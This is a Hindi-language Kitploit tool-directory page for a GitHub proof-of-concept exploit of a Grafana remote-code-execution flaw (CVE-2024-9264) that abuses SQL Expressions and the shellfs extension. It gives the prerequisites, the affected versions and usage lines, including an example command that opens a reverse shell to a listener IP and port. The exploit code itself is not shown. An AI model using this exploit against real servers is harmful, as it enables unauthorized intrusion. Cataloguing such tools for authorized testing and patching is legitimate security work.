Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-9264-RCE-Exploit — Grafana RCE एक्सप्लॉइट (CVE-2024-9264) | Kitploit
उपकरण/GitHubGitHub/z3k0sec/cve-2024-9264-rce-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubz3k0sec/cve-2024-9264-rce-exploit

CVE-2024-9264-RCE-Exploit

Grafana RCE एक्सप्लॉइट (CVE-2024-9264)

रिपॉजिटरी देखें
3951 साल पहलेKitploit द्वारा समीक्षित
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-9264-RCE-Exploit Grafana में SQL Expressions के माध्यम से

विवरण

Grafana में रिमोट कोड निष्पादन (CVE-2024-9264) के लिए प्रूफ ऑफ कॉन्सेप्ट

इस रिपॉजिटरी में एक Python स्क्रिप्ट है जो Grafana के SQL Expressions फीचर में एक Remote Code Execution (RCE) कमजोरी का शोषण करती है। अपर्याप्त इनपुट स्वच्छता का लाभ उठाकर, यह शोषण एक हमलावर को सर्वर पर मनमाना शेल कमांड निष्पादित करने की अनुमति देता है। यह shellfs सामुदायिक एक्सटेंशन के माध्यम से संभव हुआ है, जिसे एक हमलावर कमांड निष्पादन की सुविधा के लिए स्थापित और लोड कर सकता है।

पूर्वापेक्षाएँ

  • प्रमाणित Grafana उपयोगकर्ता जिसके पास Viewer अनुमति या उच्चतर हो
  • DuckDB बाइनरी को Grafana के PATH के माध्यम से स्थापित और सुलभ होना चाहिए

प्रभावित संस्करण

Grafana >= v11.0.0 (सभी v11.x.y प्रभावित हैं)

उपयोग

root@kitploit:~
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

उदाहरण

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए और नियंत्रित वातावरण में उपयोग के लिए है जहां आपके पास सिस्टम की सुरक्षा का परीक्षण करने की अनुमति है। इस टूल के दुरुपयोग से कानूनी परिणाम हो सकते हैं।

अधिक जानकारी

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

टूल डाउनलोड करें